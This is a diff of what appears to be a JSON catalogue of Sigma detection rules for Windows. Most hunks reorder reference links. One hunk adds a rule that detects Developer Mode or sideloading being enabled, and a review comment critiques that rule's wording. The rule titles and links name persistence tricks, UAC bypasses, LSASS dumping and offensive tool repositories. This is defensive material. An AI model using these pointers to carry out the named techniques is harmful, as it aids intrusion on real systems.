 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml"
 ],
 "tags": [
@@ -11715,8 +11715,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.secura.com/blog/zero-logon",
 "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
+ "https://www.secura.com/blog/zero-logon",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml"
 ],
 "tags": [
@@ -12102,8 +12102,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
+ "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml"
 ],
 "tags": [
@@ -12161,8 +12161,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml"
 ],
 "tags": [
@@ -12278,8 +12278,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/wdormann/status/1347958161609809921",
 "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/",
+ "https://twitter.com/wdormann/status/1347958161609809921",
 "https://twitter.com/jonasLyk/status/1347900440000811010",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml"
 ],
@@ -12330,8 +12330,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
+ "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml"
 ],
 "tags": [
@@ -12366,8 +12366,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
- "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
+ "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml"
 ],
 "tags": [
@@ -13101,8 +13101,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
 "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server_analytic/win_dns_analytic_apt_gallium.yml"
 ],
 "tags": [
@@ -13136,8 +13136,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
 "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml"
 ],
 "tags": [
@@ -13171,9 +13171,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker",
 "https://nxlog.co/documentation/nxlog-user-guide/applocker.html",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml"
 ],
 "tags": [
@@ -13244,11 +13244,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
- "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
+ "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
 "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
 "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c",
- "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
+ "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
+ "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml"
 ],
 "tags": [
@@ -13290,10 +13290,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_appx_package_installation.yml"
 ],
 "tags": [
@@ -13316,10 +13316,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_package_locations.yml"
 ],
 "tags": [
@@ -13330,7 +13330,7 @@
 "value": "Suspicious AppX Package Locations"
 },
 {
- "description": "Detects installation of known malicious appx packages",
+ "description": "Detects potential installation or installation attempts of known malicious appx packages",
 "meta": {
 "author": "Nasreddine Bencherchali",
 "creation_date": "2023/01/11",
@@ -13342,9 +13342,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_mal_appx_names.yml"
 ],
 "tags": [
@@ -13352,7 +13352,7 @@
 ]
 },
 "uuid": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce",
- "value": "Malicious AppX Package Installed"
+ "value": "Potential Malicious AppX Package Installation Attempts"
 },
 {
 "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain",
@@ -13367,10 +13367,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_domains.yml"
 ],
 "tags": [
@@ -13393,10 +13393,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_uncommon_package_locations.yml"
 ],
 "tags": [
@@ -13647,8 +13647,8 @@
 "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml"
 ],
 "tags": [
@@ -13959,9 +13959,9 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
 "https://www.dfirnotes.net/portproxy_detection/",
 "https://adepts.of0x.cc/netsh-portproxy-code/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml"
 ],
 "tags": [
@@ -13996,8 +13996,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/recyclebin.html",
 "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
+ "https://persistence-info.github.io/Data/recyclebin.html",
 "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml"
 ],
@@ -14057,8 +14057,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml"
 ],
 "tags": [
@@ -14359,8 +14359,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
 "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
+ "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml"
 ],
 "tags": [
@@ -14384,8 +14384,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Wsreset",
 "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly",
+ "https://lolbas-project.github.io/lolbas/Binaries/Wsreset",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml"
 ],
 "tags": [
@@ -14589,8 +14589,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/",
 "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html",
+ "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml"
 ],
 "tags": [
@@ -14614,8 +14614,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
+ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml"
 ],
 "tags": [
@@ -14764,10 +14764,10 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/hfiref0x/UACME",
- "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
- "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass",
 "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
+ "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass",
+ "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
+ "https://github.com/hfiref0x/UACME",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml"
 ],
 "tags": [
@@ -14826,8 +14826,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
 "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
+ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml"
 ],
 "tags": [
@@ -14940,8 +14940,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://wikileaks.org/vault7/#Pandemic",
 "https://twitter.com/MalwareJake/status/870349480356454401",
+ "https://wikileaks.org/vault7/#Pandemic",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml"
 ],
 "tags": [
@@ -15007,8 +15007,8 @@
 "logsource.category": "registry_delete",
 "logsource.product": "windows",
 "refs": [
- "http://woshub.com/how-to-clear-rdp-connections-history/",
 "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
+ "http://woshub.com/how-to-clear-rdp-connections-history/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml"
 ],
 "tags": [
@@ -15066,8 +15066,8 @@
 "logsource.category": "registry_delete",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://seclists.org/fulldisclosure/2020/Mar/45",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml"
 ],
 "tags": [
@@ -15115,11 +15115,11 @@
 "logsource.category": "registry_delete",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
 "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
- "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html",
 "https://github.com/OTRF/detection-hackathon-apt29/issues/7",
 "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code",
+ "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html",
+ "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml"
 ],
 "tags": [
@@ -15268,8 +15268,8 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml"
 ],
 "tags": [
@@ -15325,11 +15325,11 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
 "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
 "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/",
 "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml"
 ],
 "tags": [
@@ -15353,8 +15353,8 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
 "https://persistence-info.github.io/Data/amsi.html",
+ "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml"
 ],
 "tags": [
@@ -15575,8 +15575,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/htmlhelpauthor.html",
 "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
+ "https://persistence-info.github.io/Data/htmlhelpauthor.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml"
 ],
 "tags": [
@@ -15599,8 +15599,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/",
 "https://github.com/rootm0s/WinPwnage",
+ "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml"
 ],
 "tags": [
@@ -15700,8 +15700,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70",
 "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml"
 ],
 "tags": [
@@ -15749,8 +15749,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465",
 "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738",
+ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml"
 ],
 "tags": [
@@ -15799,9 +15799,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml"
 ],
 "tags": [
@@ -15825,13 +15825,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
- "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
 "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
 "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
+ "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
+ "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml"
 ],
 "tags": [
@@ -15867,6 +15867,30 @@
 "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86",
 "value": "Scripted Diagnostics Turn Off Check Enabled - Registry"
 },
+ {
+ "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2023/01/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_turn_on_dev_features.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/malmoeb/status/1560536653709598721",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "b110ebaf-697f-4da1-afd5-b536fa27a2c1",
+ "value": "Potential Signing Bypass Via Windows Developer Features - Registry"
+ },
 {
 "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
 "meta": {
@@ -15881,9 +15905,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml"
 ],
 "tags": [
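Review bot: The `description` of the newly added `registry_set_turn_on_dev_features.yml` entry is not a sentence — "Detects when the enablement of developer features … . Which allows the user to install untrusted packages." The wording appears to be copied from the upstream Sigma rule listed in the entry's own `refs`, so the durable fix belongs there or in the generator, but the text that reaches this galaxy should read `"description": "Detects the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\", which allows the user to install untrusted packages."`. The `falsepositive` value `Unknown` next to `"level": "high"` is also worth a look for this rule, since the same registry toggles are routinely set on developer workstations, though that too is upstream data rather than something this commit introduced.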
@@ -15917,8 +15941,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/wer_debugger.html",
 "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
+ "https://persistence-info.github.io/Data/wer_debugger.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml"
 ],
 "tags": [
@@ -15964,8 +15988,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass",
 "https://www.exploit-db.com/exploits/47696",
+ "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml"
 ],
 "tags": [
@@ -16030,8 +16054,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
+ "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml"
 ],
 "tags": [
@@ -16055,9 +16079,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
 "https://twitter.com/inversecos/status/1494174785621819397",
 "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml"
 ],
 "tags": [
@@ -16142,8 +16166,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/_vivami/status/1347925307643355138",
 "https://vanmieghem.io/stealth-outlook-persistence/",
+ "https://twitter.com/_vivami/status/1347925307643355138",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml"
 ],
 "tags": [
@@ -16177,10 +16201,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
